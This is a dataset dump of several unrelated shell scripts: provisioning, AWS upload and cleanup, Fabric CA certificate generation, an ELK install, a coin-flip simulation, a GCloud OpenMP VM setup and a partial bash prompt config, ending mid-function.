MILESTONE=/milestones/settings_customizations
if [[ ! -e ${MILESTONE} ]]; then
echo "Make customizations in settings_credentials.py then press ENTER to continue"
read
touch ${MILESTONE}
fi
MILESTONE=/milestones/make_confapache
if [[ ! -e ${MILESTONE} ]]; then
make confapache
touch ${MILESTONE}
fi
MILESTONE=/milestones/make_createdirs
if [[ ! -e ${MILESTONE} ]]; then
make create_dirs
touch ${MILESTONE}
fi
MILESTONE=/milestones/make_installgrunt
if [[ ! -e ${MILESTONE} ]]; then
su vagrant -c 'make installgrunt'
touch ${MILESTONE}
fi
MILESTONE=/milestones/make_rungrunt
if [[ ! -e ${MILESTONE} ]]; then
su vagrant -c 'make rungrunt'
touch ${MILESTONE}
fi
apache2ctl restart
| true |
c06de9fb8932af490e92788c025e3034371dfc96 | Shell | chenliru/cweb.io | /shell/sys_script/aws/aws_kill.sh | UTF-8 | 6,663 | 3.65625 | 4 | [
"MIT"
] | permissive | #!/bin/ksh93
#########################################################################
# SHELL SCRIPTS TOOLS LIBRARY
#----------------------------------------------------------------------
# 1. re-send failed data/key files (today or $1) for network/aws reasons
# 2. clean up exipired data files
#
# Author : Liru Chen
# Licensed Materials ; All Rights Reserved 2015-2019
#########################################################################
set -v
set -x
MAILALERT="lchen@livingstonintl.com"
MAILNOTICE="lchen@livingstonintl.com"
#AWS's Parameter
CURDATE=$(date +%Y%m%d)
AWSDATE=${1-$CURDATE}
#kill aws processes if any
awsprocesskill () {
ps -ef|grep -v grep|grep aws|while read owner pid ppid etc
do
kill -9 $pid
done
}
#Clean expired file types like *log after @days, under directories listed
awsbkup () {
AWSTMPDIR=/recyclebox/AWS/temp
AWSERRDIR=/recyclebox/AWS/parsererror/${AWSDATE}
[[ ! -d $AWSERRDIR ]] && mkdir -p $AWSERRDIR
CLEARSTAGE="/recyclebox/AWS/clears" #Also including this directory in CLEARDIR
CLEARDIR="
/dmqjtmp/rcp/stage/AWSOutput@"icc,vax"@5
/dmqjtmp/rcp/stage/iccdatauploadOutput@"DataFile"@5
/dmqjtmp/rcp/stage/ICCBillingUploadOutput@"DataFile"@5
/dmqjtmp/rcp/stage/ICCSetExpiryDatesOutput@"DataFile"@5
/insight/local/scripts/VaxParser/VaxParserLogs@"log"@5
/recyclebox/AWS/uploadfail/done@"ALL"@5
${CLEARSTAGE}@"ALL"@7
"
[[ ! -d $CLEARSTAGE ]] && mkdir -p $CLEARSTAGE
cd $CLEARSTAGE
for directory in $CLEARDIR
do
location=$(echo "${directory}@"|cut -f1 -d@)
types=$(echo "${directory}@"|cut -f2 -d@|tr , " ")
days=$(echo "${directory}@"|cut -f3 -d@)
[[ ! -d $location || $days == "" ]] && {
echo "$location NOT EXIST and/or Clear Day is 0"
continue
}
bkupname=$(echo $location|sed "s/\//./g")
for type in $types
do
if [[ $location == $CLEARSTAGE ]]
then
if [[ $type == ALL ]]
then
find $location -mtime +$days -exec rm -f {} \;
else
find $location -name "*${type}*" -mtime +$days -exec rm -f {} \;
fi
else
#Backup by filename and filetype
if [[ $type == ALL ]]
then
find $location -mtime +$days -print > tmplist
tar -cvf ${bkupname}.${CURDATE}.tar -L tmplist
[[ -e ${bkupname}.${CURDATE}.tar ]] && gzip -f ${bkupname}.${CURDATE}.tar
#then, delete
find $location -mtime +$days -exec rm -f {} \;
else
find $location -name "*${type}*" -mtime +$days -print > tmplist
tar -cvf ${bkupname}.${CURDATE}.tar -L tmplist
[[ -e ${bkupname}.${CURDATE}.tar ]] && gzip -f ${bkupname}.${CURDATE}.tar
#then, delete
find $location -name "*${type}*" -mtime +$days -exec rm -f {} \;
fi
fi
done
done
#backup all logs, sql files, key files if errors during query informix db
cd $AWSTMPDIR
grep -i error $AWSTMPDIR/MISSED*.out
[[ $? -eq 0 ]] && {
mail -s "VAX Errors in SQL MISSED*.out" "$MAILALERT" < /dev/null
[[ ! -d $AWSERRDIR ]] && mkdir -p $AWSERRDIR
cp $AWSTMPDIR/MISSED*.out $AWSERRDIR
cp $AWSTMPDIR/*.sql $AWSERRDIR
cp $AWSINDIR/keydone/*.txt $AWSERRDIR
}
find $AWSTMPDIR -name "*.error" -size +0 -print|
while read errorfile
do
mail -s "VAX Failed key of $errorfile" "$MAILALERT" < $errorfile
[[ ! -d $AWSERRDIR ]] && mkdir -p $AWSERRDIR
cp $errorfile $AWSERRDIR
done
}
#send out failed data/key files if any
awsload () {
AWSRUNDIR=/insight/local/scripts/VaxParser/tools
AWSPRIVATEKY=$AWSRUNDIR/.ssh/Privatekey
AWSFAILDIR=/recyclebox/AWS/uploadfail
AWSOUTBASE=/dmqjtmp/rcp/stage/AWSOutput
AWSOUTDIR=$AWSOUTBASE/output
AWSREMOTE="ingest@a0alpcdhcan01.lii01.livun.com"
AWSREMOTEDATA="/opt/ingest/informix/data/${AWSDATE}"
AWSREMOTEKEY="/opt/ingest/informix/key/${AWSDATE}"
AWSREMOTEVAX="/opt/ingest/informix/locusvax/${AWSDATE}"
#Setup DIRECTORY on AWS side
ssh -i $AWSPRIVATEKY $AWSREMOTE \
"[[ ! -d $AWSREMOTEDATA ]] && mkdir -p $AWSREMOTEDATA"
ssh -i $AWSPRIVATEKY $AWSREMOTE \
"[[ ! -d $$AWSREMOTEKEY ]] && mkdir -p $AWSREMOTEKEY"
ssh -i $AWSPRIVATEKY $AWSREMOTE \
"[[ ! -d $AWSREMOTEVAX ]] && mkdir -p $AWSREMOTEVAX"
#Start transfer data files and data token files from $AWSOUTDIR to AWS
cd $AWSOUTDIR
scp -i $AWSPRIVATEKY $AWSOUTDIR/* $AWSREMOTE:$AWSREMOTEDATA
if [[ $? -ne 0 ]]
then
mail -s "VAX incremental data upload failed" "$MAILALERT" < /dev/null
[[ ! -d $AWSFAILDIR ]] && mkdir -p $AWSFAILDIR
cp $AWSOUTDIR/* $AWSFAILDIR
mail -s "VAX upload failed incremental data copied to $AWSFAILDIR" "$MAILALERT" < /dev/null
else
mail -s "VAX incremental data upload completed" "$MAILNOTICE" < /dev/null
fi
$VAXPARSERRUNDIR/datatoken.sh
scp -i $AWSPRIVATEKY $AWSOUTDIR/*.token $AWSREMOTE:$AWSREMOTEDATA
if [[ $? -ne 0 ]]
then
mail -s "VAX incremental data token upload failed" "$MAILALERT" < /dev/null
[[ ! -d $AWSFAILDIR ]] && mkdir -p $AWSFAILDIR
cp $AWSOUTDIR/*.token $AWSFAILDIR
mail -s "VAX upload failed incremental data token copied to $AWSFAILDIR" "$MAILALERT" < /dev/null
else
mail -s "VAX incremental data token upload completed" "$MAILNOTICE" < /dev/null
fi
}
#clean up all running directories/token file for awslocus.ksh and awscoda.sh
awscleanup () {
VAXPARSERINDIR=/dmqjtmp/vaxparser
VAXPARSERPROCESSEDDIR=/dmqjtmp/vaxparserprocessed
AWSTMPDIR=/recyclebox/AWS/temp
AWSOUTBASE=/dmqjtmp/rcp/stage/AWSOutput
AWSOUTDIR=$AWSOUTBASE/output
AWSINDIR=/dmqjtmp/rcp/stage/VaxParserOutput
AWSRUNDIR=/insight/local/scripts/VaxParser/tools
#Clean vax parser running directory
[[ -d $VAXPARSERINDIR ]] && {
rm -f $VAXPARSERINDIR/*.vax
}
#clean vax parser running directory
[[ -d $VAXPARSERPROCESSEDDIR ]] && {
rm -f $VAXPARSERPROCESSEDDIR/*.vax
rm -f $VAXPARSERPROCESSEDDIR/*.vaxtoken
}
#Clean $AWSTMPDIR
[[ -d $AWSTMPDIR ]] && {
rm -f $AWSTMPDIR/*.tmp
rm -f $AWSTMPDIR/*.tmp1
rm -f $AWSTMPDIR/*.tmp2
rm -f $AWSTMPDIR/*.dbaccess
rm -f $AWSTMPDIR/*.vax4sql
rm -f $AWSTMPDIR/*.unload
rm -f $AWSTMPDIR/MISSED*.out
rm -f $AWSTMPDIR/*.sql
rm -f $AWSTMPDIR/*.error
}
#Clean $AWSOUTBASE
[[ -d $AWSOUTBASE ]] && {
rm -f $AWSOUTBASE/*done.*
rm -f $AWSOUTBASE/*current.*
}
#Clean $AWSOUTDIR
[[ -d $AWSOUTDIR ]] && {
rm -f $AWSOUTDIR/*.token
rm -f $AWSOUTDIR/*.??????????????
}
#Clean $AWSINDIR/keydone
[[ -d $AWSINDIR ]] && {
rm -f $AWSINDIR/keydone/*.txt
rm -f $AWSINDIR/keydone/*.txt.token
}
#release process token lock
[[ -e $AWSRUNDIR/run.token ]] && rm -f $AWSRUNDIR/run.token
}
#Start main
awsprocesskill
awsbkup
awsload
awscleanup
##VAX Data files, copied by runner*.ksh from /dmqjtmp/rcp/
#VAXDIR=/dmqjtmp/rcp/stage/done
#VAXDIR=/dmqjtmp/rcp/stage/done;[[ -d $VAXDIR ]] && rm -f $VAXDIR/*.vax;
exit 0
| true |
889b5b981d26ed7f34f7bf55820a99011c4e44de | Shell | Azure/Hyperledger-Fabric-on-Azure-Kubernetes-Service | /fabricTools/scripts/generateRootCertificate.sh | UTF-8 | 1,945 | 3.265625 | 3 | [
"Apache-2.0"
] | permissive | orgName=$1
domainName=$2
fabricToolsScriptStartTime=$3
. /var/hyperledger/scripts/globals.sh
. /var/hyperledger/scripts/utils.sh
rm -rf /tmp/rca
mkdir -p /tmp/rca
touch /tmp/rca/index.txt
mkdir -p /tmp/rca/newcerts
openssl ecparam -name prime256v1 -genkey -noout -out /tmp/rca/rca.key || exit 1
openssl req -config /var/hyperledger/scripts/openssl_root.cnf -new -sha256 -extensions v3_ca -key /tmp/rca/rca.key -out /tmp/rca/rca.csr -days 3650 -subj "/C=US/ST=Washington/L=Redmond/O=${orgName}/OU=${orgName}/CN=rca.${orgName}" || exit 1
openssl ca -create_serial -selfsign -days 3650 -notext -md sha256 -in /tmp/rca/rca.csr -out /tmp/rca/rca.pem -keyfile /tmp/rca/rca.key -startdate `date --date 'now - 10 minutes' +%Y%m%d%H%M%SZ` -config /var/hyperledger/scripts/openssl_root.cnf -extensions v3_ca || exit 1
# Store private certificates in secrets
CA_CERT=$(ls /tmp/rca/rca.key)
executeKubectlWithRetry "kubectl -n ${toolsNamespace} create secret generic hlf-ca-idkey --from-file=rca.key=$CA_CERT" "Storing Fabric-CA Root CA key in kubernetes secret failed" "$fabricToolsScriptStartTime" "no-verifyResult"
if [ $res -ne 0 ]; then
logMessage "Error" "Storing Fabric-CA Root CA key in kubernetes secret failed" "$fabricToolsScriptStartTime"
rm -rf /tmp/rca/*
exit 1
fi
# Store public certificates in secrets
CA_CERT=$(ls /tmp/rca/rca.pem)
executeKubectlWithRetry "kubectl -n ${toolsNamespace} create secret generic hlf-ca-idcert --from-file=rca.pem=$CA_CERT" "Storing Fabric-CA Root CA certificate in kubernetes secret failed" "$fabricToolsScriptStartTime" "no-verifyResult"
if [ $res -ne 0 ]; then
logMessage "Error" "Storing Fabric-CA Root CA certificate in kubernetes secret failed" "$fabricToolsScriptStartTime"
rm -rf /tmp/rca/*
exit 1
fi
# Copy CA Root Public certificate for TLS communication with Fabric-ca
mkdir -p /tmp/fabric-ca/tls-certfile
cp /tmp/rca/rca.pem /tmp/fabric-ca/tls-certfile/
rm -rf /tmp/rca/*
exit 0
| true |
4ddf3604e2eeb72e2a30122ed98c32cd026efbb9 | Shell | a-h/vagrant-playground | /elk.sh | UTF-8 | 6,926 | 3.484375 | 3 | [] | no_license | #!/usr/bin/env bash
# See instructions at https://www.digitalocean.com/community/tutorials/how-to-install-elasticsearch-logstash-and-kibana-4-on-centos-7
# Sync time properly.
sudo yum install ntp
##################
# Elastic Search #
##################
# Install Java 8
cd /opt
wget --no-cookies --no-check-certificate --header "Cookie: gpw_e24=http%3A%2F%2Fwww.oracle.com%2F; oraclelicense=accept-securebackup-cookie" \
"http://download.oracle.com/otn-pub/java/jdk/8u40-b25/jre-8u40-linux-x64.tar.gz"
# Extract archive.
tar xvf jre-8*.tar.gz
chown -R root: jre1.8*
# Alias java to use the correct version
sudo alternatives --install /usr/bin/java java /opt/jre1.8*/bin/java 1
# Delete old archive.
rm /opt/jre-8*.tar.gz
# Install Elasticsearch
rpm --import http://packages.elasticsearch.org/GPG-KEY-elasticsearch
# Configure yum to allow it
echo "[elasticsearch-1.6]" > /etc/yum.repos.d/elasticsearch.repo
echo "name=Elasticsearch repository for 1.6.x packages" >> /etc/yum.repos.d/elasticsearch.repo
echo "baseurl=http://packages.elasticsearch.org/elasticsearch/1.6/centos" >> /etc/yum.repos.d/elasticsearch.repo
echo "gpgcheck=1" >> /etc/yum.repos.d/elasticsearch.repo
echo "gpgkey=http://packages.elasticsearch.org/GPG-KEY-elasticsearch" >> /etc/yum.repos.d/elasticsearch.repo
echo "enabled=1" >> /etc/yum.repos.d/elasticsearch.repo
# Do it
yum -y install elasticsearch
# Consider modifying /etc/elasticsearch/elasticsearch.yml to remove access outside of localhost.
# Start it up.
systemctl start elasticsearch.service
# Start it when the system starts.
/bin/systemctl daemon-reload
systemctl enable elasticsearch.service
##########
# Kibana #
##########
cd ~; wget https://download.elastic.co/kibana/kibana/kibana-4.0.3-linux-x64.tar.gz
tar xvf kibana-*.tar.gz
# Consider limiting access to kibana by changing the host at ~/kibana-4*/config/kibana.yml
# Move kibana into a better location
sudo mkdir -p /opt/kibana
sudo cp -R ~/kibana-4*/* /opt/kibana/
# Create start up file.
echo "[Service]" >> /etc/systemd/system/kibana4.service
echo "ExecStart=/opt/kibana/bin/kibana" >> /etc/systemd/system/kibana4.service
echo "Restart=always" >> /etc/systemd/system/kibana4.service
echo "StandardOutput=syslog" >> /etc/systemd/system/kibana4.service
echo "StandardError=syslog" >> /etc/systemd/system/kibana4.service
echo "SyslogIdentifier=kibana4" >> /etc/systemd/system/kibana4.service
echo "User=root" >> /etc/systemd/system/kibana4.service
echo "Group=root" >> /etc/systemd/system/kibana4.service
echo "Environment=NODE_ENV=production" >> /etc/systemd/system/kibana4.service
echo "" >> /etc/systemd/system/kibana4.service
echo "[Install]" >> /etc/systemd/system/kibana4.service
echo "WantedBy=multi-user.target" >> /etc/systemd/system/kibana4.service
# Start it up.
sudo systemctl start kibana4
sudo systemctl enable kibana4
# If access to Kibana is limited, then we should create a nginx proxy to allow access.
############
# Logstash #
############
# The Logstash package shares the same GPG Key as Elasticsearch, and we already installed that public key,
# so let's create and edit a new Yum repository file for Logstash:
echo "[logstash-1.5]" > /etc/yum.repos.d/logstash.repo
echo "name=logstash repository for 1.5.x packages" >> /etc/yum.repos.d/logstash.repo
echo "baseurl=http://packages.elasticsearch.org/logstash/1.5/centos" >> /etc/yum.repos.d/logstash.repo
echo "gpgcheck=1" >> /etc/yum.repos.d/logstash.repo
echo "gpgkey=http://packages.elasticsearch.org/GPG-KEY-elasticsearch" >> /etc/yum.repos.d/logstash.repo
echo "enabled=1" >> /etc/yum.repos.d/logstash.repo
yum -y install logstash
# Logstash is installed but it is not configured yet.
# using hard coded ip here.
sed -i -e "s/\[ v3_ca \]/[ v3_ca ]\nsubjectAltName = IP: 192.168.80.0/g" /etc/pki/tls/openssl.cnf
# Generate SSL cert.
cd /etc/pki/tls
sudo openssl req -config /etc/pki/tls/openssl.cnf -x509 -days 3650 -batch -nodes -newkey rsa:2048 -keyout private/logstash-forwarder.key -out certs/logstash-forwarder.crt
mkdir /etc/logstash/
mkdir /etc/logstash/conf.d/
mkdir /opt/logstash/patterns
cat > /opt/logstash/patterns/nginx <<end_of_nginx_pattern
NGUSERNAME [a-zA-Z\.\@\-\+_%]+
NGUSER %{NGUSERNAME}
NGINXACCESS %{IPORHOST:clientip} %{NGUSER:ident} %{NGUSER:auth} \[%{HTTPDATE:timestamp}\] "%{WORD:verb} %{URIPATHPARAM:request} HTTP/%{NUMBER:httpversion}" %{NUMBER:response} (?:%{NUMBER:bytes}|-) (?:"(?:%{URI:referrer}|-)"|%{QS:referrer}) %{QS:agent}
end_of_nginx_pattern
sudo chown logstash:logstash /opt/logstash/patterns/nginx
echo "input {" > /etc/logstash/conf.d/01-lumberjack-input.conf
echo " lumberjack {" >> /etc/logstash/conf.d/01-lumberjack-input.conf
echo " port => 5000" >> /etc/logstash/conf.d/01-lumberjack-input.conf
echo " type => \"logs\"" >> /etc/logstash/conf.d/01-lumberjack-input.conf
echo " ssl_certificate => \"/etc/pki/tls/certs/logstash-forwarder.crt\"" >> /etc/logstash/conf.d/01-lumberjack-input.conf
echo " ssl_key => \"/etc/pki/tls/private/logstash-forwarder.key\"" >> /etc/logstash/conf.d/01-lumberjack-input.conf
echo " }" >> /etc/logstash/conf.d/01-lumberjack-input.conf
echo "}" >> /etc/logstash/conf.d/01-lumberjack-input.conf
# Create filter for syslog messages
cat > /etc/logstash/conf.d/10-syslog.conf <<syslog_filter
filter {
if [type] == "syslog" {
grok {
match => { "message" => "%{SYSLOGTIMESTAMP:syslog_timestamp} %{SYSLOGHOST:syslog_hostname} %{DATA:syslog_program}(?:\[%{POSINT:syslog_pid}\])?: %{GREEDYDATA:syslog_message}" }
add_field => [ "received_at", "%{@timestamp}" ]
add_field => [ "received_from", "%{host}" ]
}
syslog_pri { }
date {
match => [ "syslog_timestamp", "MMM d HH:mm:ss", "MMM dd HH:mm:ss" ]
}
}
}
syslog_filter
# Create filter for nginx messages.
cat > /etc/logstash/conf.d/11-nginx.conf <<end_of_logstash_nginx_configuration
filter {
if [type] == "nginx-access" {
grok {
match => { "message" => "%{NGINXACCESS}" }
}
}
}
end_of_logstash_nginx_configuration
# Create filter for weblogic messages.
cat > /etc/logstash/conf.d/12-weblogic.conf <<end_of_weblogic_configuration
filter {
## WebLogic Server Http Access Log
if [type] == "weblogic-access" {
grok {
match => [ "message", "%{IP:client} - - \[(?<timestamp>%{MONTHDAY}[./-]%{MONTH}[./-]%{YEAR}:%{TIME}\s+%{ISO8601_TIMEZONE})] \"%{WORD:verb} %{URIPATHPARAM:uri}\s+HTTP.+?\" %{NUMBER:status} %{NUMBER:response_time}" ]
}
date {
match => [ "timestamp" , "dd/MMM/yyyy:HH:mm:ss Z" ]
}
}
}
end_of_weblogic_configuration
# Setup elastic search location
echo "output {" > /etc/logstash/conf.d/30-lumberjack-output.conf
echo " elasticsearch { host => localhost }" >> /etc/logstash/conf.d/30-lumberjack-output.conf
echo " stdout { codec => rubydebug }" >> /etc/logstash/conf.d/30-lumberjack-output.conf
echo "}" >> /etc/logstash/conf.d/30-lumberjack-output.conf
sudo service logstash restart | true |
d8cbcdae932282f5a1d90d91a100ad50d214f267 | Shell | DesarrollosEfx/redcpp | /ns-scripts/upload.sh | UTF-8 | 128 | 2.765625 | 3 | [
"MIT"
] | permissive | echo "Uploading:";
for filename in dist/*.js; do
[ -e "$filename" ] || continue
echo $filename
ns -u $filename
done
| true |
49b5b0d6675eede704b4eba716df377436b8017e | Shell | anshuljain21120/flip-combined-coin-simulation | /flipCoinCombination.sh | UTF-8 | 1,905 | 3.9375 | 4 | [] | no_license | #! /bin/bash -x
echo "Welcome to Flip Combined Coin Simulation!";
echo "This problem displays winning percentage of Head or Tail combination in a single, Doublet or Triplet";
function flip_a_coin()
{
if [ $((RANDOM%2)) -eq 1 ]
then
echo "H";
else
echo "T";
fi
}
function flip_combined_coin()
{
local limit=$1;
local result="";
while [ $limit -gt 0 ]
do
result="$result$( flip_a_coin )";
((limit--));
done
echo "$result";
}
function flip_coin_till()
{
local -n _dict=$1;
local combination=$2;
local limit=${3:-10};
for (( counter=1; counter<=limit; counter++ ))
do
toss_result="$( flip_combined_coin $2 )";
_dict["$toss_result"]=$(( ${_dict["$toss_result"]} + 1 ));
done
for key in ${!_dict[@]};
do
_dict[$key]=$(( (_dict[$key]*100)/$limit ));
done
}
function get_max_value()
{
local -n _dict=$1;
local _max_value=-999;
for key in ${!_dict[@]}
do
if [ $_max_value -lt $((_dict[$key])) ]
then
_max_value=$((_dict[$key]));
fi
done
echo "$_max_value";
}
function max()
{
if [ "$1" -gt "$2" ]
then
echo "$1";
else
echo "$2";
fi
}
declare -A singlet_toss_distribution;
singlet_toss_distribution=(["H"]=0 ["T"]=0 );
flip_coin_till singlet_toss_distribution 1;
declare -A doublet_toss_distribution;
doublet_toss_distribution=(["HH"]=0 ["HT"]=0 ["TH"]=0 ["TT"]=0 );
flip_coin_till doublet_toss_distribution 2;
declare -A triplet_toss_distribution;
triplet_toss_distribution=(["HHH"]=0 ["HHT"]=0 ["HTH"]=0 ["HTT"]=0 ["THH"]=0 ["THT"]=0 ["TTH"]=0 ["TTT"]=0 );
flip_coin_till triplet_toss_distribution 3;
maximum_of_all=-999;
maximum_of_all=$( max "$(get_max_value singlet_toss_distribution)" "$maximum_of_all" );
maximum_of_all=$( max "$(get_max_value doublet_toss_distribution)" "$maximum_of_all" );
maximum_of_all=$( max "$(get_max_value triplet_toss_distribution)" "$maximum_of_all" );
echo "Winner of all three combination is value: $maximum_of_all"; | true |
2b546562597023ea758f5c9ddeb0d36055e0c153 | Shell | goraxe/dotfiles | /.bash_login | UTF-8 | 283 | 2.8125 | 3 | [] | no_license | # vim: ft=sh
SSH_AGENT_PID=""
trap "echo No ^C here" INT TERM EXIT
# source addtional based on TERM
if [[ -e ~/.bash_login.${TERM} ]]; then
. ~/.bash_login.${TERM}
else
now=`date +"%d-%m-%Y %H:%M"`
echo "$now $TERM" >> ~/log/login.terms
fi
source .login
. "$HOME/.cargo/env"
| true |
01e60f9c073c9a4440557eecd82d96d7ca4be69f | Shell | myx/myx.distro-prepare | /source-process/builders/2211-project-source.sh | UTF-8 | 719 | 3.515625 | 4 | [
"BSD-3-Clause"
] | permissive | Require ListChangedSourceProjects
Require ListProjectProvides
MakeProjectSourceArchive(){
local PKG="${1#$MMDAPP/source/}"
if [ -z "$PKG" ] ; then
echo "MakeProjectSourceArchive: 'PKG' argument is required!" >&2 ; exit 1
fi
local CHECK_DIR="$MDSC_SOURCE/$PKG"
local BUILT_DIR="$MDSC_OUTPUT/$PKG"
local BASE_ROOT="`dirname "$CHECK_DIR"`"
local PACK_ROOT="`basename "$CHECK_DIR"`"
mkdir -p "$BUILT_DIR"
tar -zcv -C "$BASE_ROOT" -f "$BUILT_DIR/project-source.tgz" "$PACK_ROOT"
}
for PKG in $( ListChangedSourceProjects ) ; do
if test ! -z "$( ListProjectProvides "$PKG" "source-process" | grep -e "^project-source.tgz$" )" ; then
Async "`basename "$PKG"`" MakeProjectSourceArchive "$PKG"
wait
fi
done
| true |
e08c203f6e49bc0643a9ab67dab538057d802086 | Shell | maxnz/gcloud-openmp-setup | /setup.bash | UTF-8 | 7,226 | 3.734375 | 4 | [] | no_license | #/bin/bash
USED_ZONES=
NUMUSEDZONES=0
OLD_PROJECT=`gcloud config list project 2> /dev/null | grep "project = " | cut -d ' ' -f 3`
PROJECT=
PREFIX='openmp-' # Must start with a letter
VMCORES=8
re_num='^[0-9]+$'
QUIET=0
# Ask user for the project they want to use
ask_project() {
echo -n "Project Name (leave blank to use current project $OLD_PROJECT): "
read project
if [[ $project != "" ]]
then
set_project $project
else
set_project $OLD_PROJECT
fi
}
# Get a random zone from zones.txt
get_rand_zone() {
if [[ $NUMUSEDZONES == 20 ]]
then
echo "No remaining zones"
exit 1
fi
z=$RANDOM
numzones=`wc zones.txt -l | cut -d ' ' -f 1`
let "z %= $numzones"
let "z++"
ZONE=`sed "${z}q;d" zones.txt`
zonec=`echo $ZONE | cut -d '-' -f 1`
zonel=`echo $ZONE | cut -d '-' -f 2`
zone="${zonec}-${zonel}"
echo $USED_ZONES | grep $zone &> /dev/null
if [[ $? == 0 ]]
then
get_rand_zone
else
USED_ZONES="$USED_ZONES $ZONE"
let "NUMUSEDZONES++"
touch quotas.temp
gcloud compute regions describe $zone > quotas.temp
LINES=`wc quotas.temp -l | cut -d ' ' -f 1`
for ((i=1;i<=LINES;i++))
do
LINE=`sed "${i}q;d" quotas.temp`
echo $LINE | grep "limit:" &> /dev/null
if [[ $? == 0 ]]
then
sed "$(($i+1))q;d" quotas.temp | grep "CPUS" &> /dev/null
if [[ $? == 0 ]]
then
REGCPUUSAGE=`sed "$(($i+2))q;d" quotas.temp | sed 's/ \+/ /g' | cut -d ' ' -f 3 | cut -d '.' -f 1`
REGCPUQUOTA=`sed "${i}q;d" quotas.temp | sed 's/ \+/ /g' | cut -d ' ' -f 3 | cut -d '.' -f 1`
let "REGREMCPUS = $REGCPUQUOTA - $REGCPUUSAGE"
if [ $REGREMCPUS -lt $VMCORES ]
then
echo "Not enough CPUs remaining in region quota: $REGREMCPUS remaining in $zone"
get_rand_zone
fi
break
fi
fi
done
rm quotas.temp
fi
}
get_quota() {
touch quotas.temp
gcloud compute project-info describe --project $PROJECT > quotas.temp
LINES=`wc quotas.temp -l | cut -d ' ' -f 1`
for ((i=1;i<=LINES;i++))
do
LINE=`sed "${i}q;d" quotas.temp`
echo $LINE | grep "limit:" &> /dev/null
if [[ $? == 0 ]]
then
sed "$(($i+1))q;d" quotas.temp | grep "CPUS_ALL_REGIONS" &> /dev/null
if [[ $? == 0 ]]
then
CPUUSAGE=`sed "$(($i+2))q;d" quotas.temp | sed 's/ \+/ /g' | cut -d ' ' -f 3 | cut -d '.' -f 1`
CPUQUOTA=`sed "${i}q;d" quotas.temp | sed 's/ \+/ /g' | cut -d ' ' -f 3 | cut -d '.' -f 1`
let "REMCPUS = $CPUQUOTA - $CPUUSAGE"
if [ $REMCPUS -lt $VMCORES ]
then
echo "Not enough CPUs remaining in quota: $REMCPUS remaining"
rm quotas.temp
exit 1
fi
break
fi
fi
done
rm quotas.temp
}
confirm_opts() {
INSTANCES=`gcloud compute instances list 2> /dev/null`
for ((i=0;;i++))
do
echo $INSTANCES | grep "$PREFIX$i " &> /dev/null
if [[ $? != 0 ]]
then
NAME="$PREFIX$i"
break
fi
done
echo
echo "Configuration:"
echo "Project: $PROJECT"
echo "VM Size: $VMCORES Cores"
echo "VM Name: $NAME"
if [[ $QUIET == 1 ]]; then return; fi;
echo -n "Continue? (Y/n): "
read con
con=`echo $con | head -c1`
if [[ $con == 'n' || $con == 'N' ]]
then
echo "Abort"
exit -1
fi
}
# Set up VM
create_vm() {
echo "Creating VM"
while true
do
get_rand_zone
gcloud compute instances create \
--machine-type=n1-standard-$VMCORES --image-family=debian-9 \
--image-project=debian-cloud --zone $ZONE $NAME > /dev/null
RET=$?
if [[ $RET != 0 ]]
then
echo "Exception while creating VM. Retrying."
continue
fi
break
done
}
# Configure the VM
config_vm() {
gcloud compute ssh $NAME --zone $ZONE --command \
"sudo apt install g++ make -y; \
cd /etc/skel; \
sudo wget http://csinparallel.cs.stolaf.edu/CSinParallel.tar.gz; \
sudo tar -xf CSinParallel.tar.gz && sudo rm CSinParallel.tar.gz; \
sudo cp -r /etc/skel/CSinParallel ~; \
sudo chmod -R 777 ~/CSinParallel; \
sudo mkdir /etc/skel/.ssh; \
sudo touch /etc/skel/.ssh/authorized_keys"
}
source "./common.bash"
while test $# -gt 0
do
case "$1" in
-h|--help)
echo "GCloud OpenMP VM Setup Script"
echo
echo "Options:"
echo "-h, --help show this help message"
echo "-p, --project ID set the project to use (ID = full project id)"
echo
echo "-q, --quiet run the script with default options (unless specified otherwise):"
echo " 8 cores"
echo
echo " --prefix specify the prefix to use when naming the VM (must start with a letter)"
echo " the script will add a -# when naming the VM"
echo "-c [1|2|4|8|16|32|64|96]"
echo " set the number of cores in the VM"
echo " default=8"
exit -1
;;
-q|--quiet)
shift
if [[ $PROJECT == "" ]]; then PROJECT=$OLD_PROJECT; fi;
QUIET=1
;;
-c)
shift
if test $# -gt 0
then
VMCORES=$1
if ! [[ $VMCORES =~ $re_num ]]
then
invalid_argument $VMCORES "-c"
fi
if ! [[ $VMCORES == 1 || $VMCORES == 2 || $VMCORES == 4 || $VMCORES == 8 || \
$VMCORES == 16 || $VMCORES == 32 || $VMCORES == 64 || $VMCORES == 96 ]]
then
invalid_argument $VMCORES "-c"
fi
shift
else
missing_argument "-c"
fi
;;
-p|--project)
shift
if test $# -gt 0
then
set_project $1
shift
else
missing_argument "-p|--project"
fi
;;
--prefix)
shift
if test $# -gt 0
then
PREFIX="$1-"
shift
else
missing_argument "--prefix"
fi
;;
*)
echo "Unrecognized flag $1"
exit 1
;;
esac
done
if [[ $PROJECT == "" ]]
then
ask_project
fi
get_quota
confirm_opts
create_vm
gcloud compute config-ssh &> /dev/null
config_vm
if [[ $PROJECT != $OLD_PROJECT ]]
then
set_project $OLD_PROJECT
fi
| true |
540e318862d3c64db6330ffbd504a0813b2e8a59 | Shell | morristech/dotfiles-52 | /.config/bashrc.d/prompt.bash | UTF-8 | 2,064 | 3.5 | 4 | [] | no_license | # shellcheck disable=SC2034
#########################
# git setup
#########################
# source git's ps1 script
# shellcheck source=/usr/local/etc/bash_completion.d/git-prompt.sh
test -r "$HOMEBREW_PREFIX"/etc/bash_completion.d/git-prompt.sh && source "$_"
# display working directory state (* for modified/+ for staged)
GIT_PS1_SHOWDIRTYSTATE=true
# display stashed state ($ if there are stashed files)
GIT_PS1_SHOWSTASHSTATE=true
# display HEAD vs upstream state
GIT_PS1_SHOWUPSTREAM="auto"
# use colors
GIT_PS1_SHOWCOLORHINTS=true
# detached-head description
GIT_PS1_DESCRIBE_STYLE=branch
#########################
# colors (solarized)
#########################
test "$(tput colors)" -ge 256
__colorbit=$?
__color() {
while [ $# -gt 0 ]; do
local -a code=()
local control='' special=''
case "$1" in
base0) code=(244 12) ;;
base1) code=(245 14) ;;
base2) code=(254 7) ;;
base3) code=(230 15) ;;
base00) code=(241 11) ;;
base01) code=(240 10) ;;
base02) code=(235 0) ;;
base03) code=(234 8) ;;
yellow) code=(136 3) ;;
orange) code=(166 9) ;;
red) code=(160 1) ;;
magenta) code=(125 5) ;;
violet) code=(61 13) ;;
blue) code=(33 4) ;;
cyan) code=(37 6) ;;
green) code=(64 2) ;;
reset) control=sgr0;;
reverse) control=rev;;
underline) control=smul;;
